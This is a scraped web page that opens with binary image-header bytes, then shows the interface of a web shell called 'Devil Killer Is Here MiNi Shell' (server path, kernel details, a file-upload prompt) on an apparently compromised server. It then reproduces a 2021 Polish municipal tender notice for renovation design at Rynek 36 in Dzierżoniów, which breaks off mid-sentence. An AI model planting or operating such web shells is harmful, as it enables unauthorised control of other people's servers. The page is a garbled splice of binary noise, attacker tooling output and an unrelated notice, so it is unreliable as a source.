JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210520/0006049301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00060493 z dnia 2021-05-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wyk.dok. proj. i spec. tech. wyk. i odb.r. bud. dla remontu pomieszczeń zlok. na II kondygnacji (pow. ok. 316m2) oraz na I kond. (...) w ram. zad. inwest. pn. „Remont pomieszczeń w budynku Rynek 36”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48746450397</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48746450882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyk.dok. proj. i spec. tech. wyk. i odb.r. bud. dla remontu pomieszczeń zlok. na II kondygnacji (pow. ok. 316m2) oraz na I kond. (...) w ram. zad. inwest. pn. „Remont pomieszczeń w budynku Rynek 36”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-27438050-b941-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00060493</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001996/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.19 Remont pomieszczeń w budynku Rynek 36</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie<br/>zakupowej eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram,<br/>procesor Intel IV2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich<br/>nowsze wersje;Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w<br/>najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;Włączona obsługa<br/>JavaScript;Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez<br/>Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowaniaUTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę<br/>stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego odpowiednim źródłem czasu. Zamawiający określił dopuszczalne formaty<br/>przesyłanych danych w SWZ tj. plików owielkości do 100 MB. Zamawiający rekomenduje<br/>wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg(.jpeg) ze szczególnym wskazaniem na .pdf. W<br/>celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip<br/>lub .7Z. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej zostały opisane na Platformie w zakładce „Regulacje i procedury procesu zakupowego”<br/>pod adresem internetowymhttps://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z<br/>postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda<br/>ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.Oferta<br/>wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i złożona w formie<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej<br/>opatrzonej podpisem osobistym albo podpisem zaufanym pod rygorem nieważności.Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów musi<br/>być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74<br/>645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22<br/>tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu<br/>przeprowadzenia zamówienia publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu<br/>zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c<br/>RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z<br/>aktami wykonawczymi do ustawy 3. Ustawy z dnia 27.08.2009r. o finansach publicznych. W przypadku<br/>wyboru najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie<br/>jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia<br/>działań na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres<br/>trwałości projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz adresu<br/>prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie<br/>Zamówień Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej<br/>eZamawiający,-w Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom<br/>biorącym udział w postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom<br/>świadczącym usługi na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny<br/>S.A.-dostawca platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy<br/>w/w dane mogą zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w<br/>trybie dostępu do informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa<br/>związane z przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem,<br/>następujące prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;Nie przysługuje Ci:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna stanowi załącznik nr 11 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR-P.271.41.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 24000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowej i specyfikacji<br/>technicznych wykonania, i odbioru robót budowlanych dla remontu pomieszczeń<br/>zlokalizowanych na II kondygnacji (pow. ok. 316m2) oraz na I kondygnacji (pow. ok. 130m2) w<br/>budynku nr 36 przy ul. Rynek w Dzierżoniowie, w ramach realizacji zadania inwestycyjnego pn.<br/>„Remont pomieszczeń w budynku Rynek 36”. Zamawiający ponadto informuje, że budynek<br/>wpisany jest do rejestru zabytków.2. Zakres rzeczowy przedmiotu zamówienia obejmuje<br/>wykonanie dokumentacji projektowej i specyfikacji technicznych wykonania i odbioru robót<br/>budowlanych:1) zgodnie z Rozporządzeniem Ministra Infrastruktury z 02.09.2004r. z<br/>późniejszymi zmianami w sprawie szczegółowego zakresu i formy dokumentacji projektowej,<br/>specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -<br/>użytkowego (t.j. Dz.U. z 2013r., poz.1129), w zakresie specjalności: architektoniczno budowlanej,<br/>oraz instalacji sanitarnych i elektrycznych;2) zgodnie z Rozporządzeniem Ministra<br/>Infrastruktury z dnia 12 kwietnia 2002r. (t.j. Dz.U.2019 poz. 1065 z póź. zm.) w sprawie<br/>warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie;W przypadku<br/>udokumentowania braku możliwości uzyskania parametrów zgodnych z w/w rozporządzeniem<br/>należy uzyskać zgodę na odstępstwo od przepisów techniczno-budowlanych w trybie art. 9<br/>ustawy Prawo Budowlane. Postanowienie na odstępstwo należy uzyskać od właściwego organu<br/>administracji architektoniczno-budowlanej; 3) zgodnie z Rozporządzeniem Ministra Rozwoju z<br/>dnia 11.09.2020r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2020,<br/>poz. 1609);4) zgodnie z Prawem Zamówień Publicznych (Dz.U. z 2019 poz. 2019 z późn zm.),<br/>gdyż opracowana przez Wykonawcę dokumentacja będzie stanowiła część opisu przedmiotu<br/>zamówienia w zamówieniu publicznym na roboty budowlane;5) zgodnie ze wszystkimi<br/>pozostałymi przepisami szczegółowymi mającymi zastosowanie i wpływ na kompletność i<br/>prawidłowość wykonania dokumentacji projektowej, w tym z prawem budowlanym;oraz<br/>wykonanie:- kosztorysów inwestorskich i przedmiarów robót zgodnie z Rozporządzeniem<br/>Ministra Infrastruktury z dn. 18.05.2004r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz<br/>planowanych kosztów robót budowlanych określonych w programie funkcjonalno – użytkowym<br/>(Dz.U. z 2004r. Nr 130, poz. 1389) z podziałem na branże, w tym oddzielnie dla piętra I i pietra<br/>II;3. Zakres rzeczowy przedmiotu zamówienia obejmuje ponadto:1) uzyskanie decyzji o<br/>pozwoleniu na budowę/zgody od właściwego organu na realizację robót, oraz wszelkich innych<br/>decyzji wymaganych prawem wraz z wszelkimi wymaganymi uzgodnieniami, w tym decyzji<br/>Konserwatora zabytków. Wykonawca zobowiązany jest do uzupełnienia materiałów oraz<br/>udzielania stosownych wyjaśnień na wezwanie właściwego organu po złożeniu wniosku o<br/>wydanie zgody/decyzji na realizację robót i w trakcie postępowania;2) wykonanie wszelkich<br/>niezbędnych opracowań (w tym opiniii ekspertyz) wymaganych obowiązującym prawem<br/>warunkujących uzyskanie decyzji/zgody na realizację robót;3) wykonanie niezbędnej<br/>inwentaryzacji budowlanej obiektu na potrzeby wykonania dokumentacji projektowej;4)<br/>uzyskanie z Wydziału Gospodarki Nieruchomości i Architektury wypisu i wyrysu z Miejskiego<br/>Planu Zagospodarowania Przestrzennego o ile zachodzi taka konieczność;5) uzyskanie mapy<br/>sytuacyjno – wysokościowej na potrzeby projektu;6) uzyskanie warunków przyłączenia mediów<br/>(np. oświetlenia) o ile zajdzie taka konieczność;4. Zakres rzeczowy projektu budowlanego<br/>obejmuje w szczególności:4.1 Remont pomieszczeń zlokalizowanych na II piętrze w zakresie: 1)<br/>korytarza (wymiana okna, posadzki, malowanie ścian i sufitu wraz z wykonaniem niezbędnych<br/>napraw tynkarskich i wymiany instalacji elektrycznej);2) zaadaptowania części pomieszczenia nr<br/>2.1 na pomieszczenie serwerowni (remont posadzki, ścian, wymiana okna instalacji, wentylacja<br/>itd), wraz z okablowaniem, szafą krosowniczą 800 x800 – 24U, obsługującej pomieszczenia nr<br/>2.5, 2.4, 2.3, 2.2, 2.1 oraz zlokalizowaną na I piętrze salą konferencyjną. W szafie krosowniczej<br/>zaprojektować m.in. Patch Panel, switch oraz media konwerter. Drzwi do serwerowni powinny<br/>spełniać podwyższone normy bezpieczeństwa stosowane w serwerowniach. Od serwerowni<br/>należy zaprojektować połączenie światłowodowe do studni teletechnicznej zlokalizowanej przy<br/>budynku Rynek nr 36 - skrzyżowanie ulic Rynek i Świdnicka. Ze studni tej istnieje<br/>światłowodowe połączenie z tut. Urzędem (budynek Ratusza). Ponadto, również pomieszczenie<br/>2.7 należy zaadaptować na pomieszczenie serwerowni, zaprojektować w nim sieć LAN 3x3,<br/>instalację elektryczną itd. Do tego pomieszczenia zostanie przeniesiony serwer z I piętra<br/>budynku. Zaprojektowaną sieć LAN z pomieszczeń 2.6, 2.8. 2.9, 2.10, 2.11 należy włączyć do<br/>szafy krosowniczej znajdującej się na I piętrze w pomieszczeniu CUW. 3) pomieszczenia nr 2.14<br/>wc - remont sufitu, ścian, posadzki, wymiana drzwi oraz armatury;4) wymiany stolarki okiennej<br/>(wraz z parapetami) i drzwiowej na II piętrze;5) wyrównanie (np. poprzez wyminę istniejących<br/>warstw stropowych) oraz wymianę istniejących posadzek w pomieszczeniach (likwidacja<br/>progów) na wykładzinę obiektową oraz malowanie ścin i sufitów wraz z wykonaniem gładzi i<br/>naprawą tynków oraz likwidacją zarysowań ścian i sufitów;6) wymiany grzejników w<br/>pomieszczeniach wraz z montażem zaworów termostatycznych;7) wymiany inst. elektrycznej<br/>oświetlenia i gniazd wtykowych, w tym zaprojektowanie instalacji elektrycznej dedykowanej<br/>(komputerowej);8) zaprojektowania sieci komputerowej (LAN) i internetowej oraz telefonicznej w<br/>pomieszczeniach, ilość stanowisk komputerowych w pomieszczeniach II piętra została określona<br/>na szkicu stanowiącym załącznik nr 1; 9) zmniejszenie otworów drzwiowych do wielkości<br/>normatywnych w pom. nr 2.6 oraz 2.11; 10) w pomieszczeniu nr 2.5 wyodrębnić zaplecze<br/>socjalne z kącikiem kuchennym doprowadzając wodę i kanalizację sanitarną, pomieszczenie to<br/>wyposażyć w kuchnię indukcyjną wraz ze stosowną instalacją elektryczną, zlewozmywakiem i<br/>umeblowaniem;4.2 Remont pomieszczeń sali konferencyjnej i zaplecza zlokalizowanych na I<br/>piętrze w zakresie • wyrównanie i wymianę istniejącej podłogi (paneli) na parkiet w sali<br/>konferencyjnej oraz w zapleczu na wykładzinę obiektową,• wymianę istniejącej stolarki okiennej i<br/>parapetów, renowację i malowanie stolarki drzwiowej wraz z montażem progu kamiennego przy<br/>drzwiach wejściowych do sali konferencyjnej,• przearanżowanie istniejącego zaplecza na<br/>pomieszczenie socjalne z kącikiem kuchennym doprowadzając wodę i kanalizację sanitarną;<br/>pomieszczenie to wyposażyć w kuchnię indukcyjną wraz ze stosowną instalacją elektryczną,<br/>zlewozmywakiem i umeblowaniem,• wyminę inst. elektrycznej oświetlenia i gniazd wtykowych w<br/>obrębie pomieszczeń wraz z montażem licznika energii elektrycznej określającego zużycie<br/>energii w tych pomieszczeniach oraz pom. 2.1, 2.2, 2.3, 2.4, 2.5, 2.15, 2.16, 2.14, 2.13 (zlokalizowanych na II p.) • malowanie ścin i sufitów wraz z wykonaniem gładzi i naprawą tynków<br/>oraz likwidacją zarysowań ścian i sufitów; malowanie grzejników i rur, montaż zaworów<br/>termostatycznych,• remont sufitu wraz z odtworzeniem sztukaterii i montażem stylizowanego<br/>żyrandolu i kinkietów ściennych w sali konferencyjnej,• wykonanie sieci komputerowej (LAN) i<br/>internetowej, wyposażenie audio-wideo, ekran zwijany, żaluzje okienne, • wymianę istniejącej<br/>zabudowy ściennej w korytarzu przed wejściem do sali lub lub jej osłonięcie/zabudowę mające<br/>na celu poprawę estetyki ściennej ciągu korytarzowego.Prace projektowe należy wykonać z<br/>zapewnieniem likwidacji barier architektonicznych dla osób niepełnosprawnych.5. Zamawiający<br/>informuje, że budynek wpisany jest do rejestru zabytków.6. Należy sporządzić niezbędną ilość<br/>egzemplarzy dokumentacji projektowej w celu przekazania ich odpowiednim instytucjom oraz<br/>dostarczyć Zamawiającemu:1) projekt budowlany w tym: projekt zagospodarowania terenu,<br/>projekt architektoniczno-budowlany, projekt techniczny - 5 egzemplarzy;2) projekt wykonawczy -<br/>5 egzemplarzy;3) przedmiar robót - 2 egzemplarze, z podziałem na branże, w tym oddzielnie dla<br/>piętra I i pietra II;4) kosztorys inwestorski - 2 egzemplarze, z podziałem na branże, w tym<br/>oddzielnie dla piętra I i pietra II;5) specyfikacje techniczne wykonania i odbioru robót<br/>budowlanych - 5 egzemplarzy.7. Załączniki formalno-prawne, w tym decyzje, opinie,<br/>uzgodnienia Wykonawca przekaże Zamawiającemu w oryginałach. Ponadto należy przekazać<br/>Zamawiającemu w/w dokumentację w formie elektronicznej PDF, w jednym egzemplarzu (1<br/>płyta CD), która będzie zgodna z formą papierową w/w opracowań.8. Wspólny Słownik<br/>Zamówień: 71220000-6 usługi projektowania architektonicznego Dodatkowe przedmioty :<br/>71323100-9 usługi projektowania systemów zasilania energią elektryczną9. Wykonawca udzieli<br/>Zamawiającemu 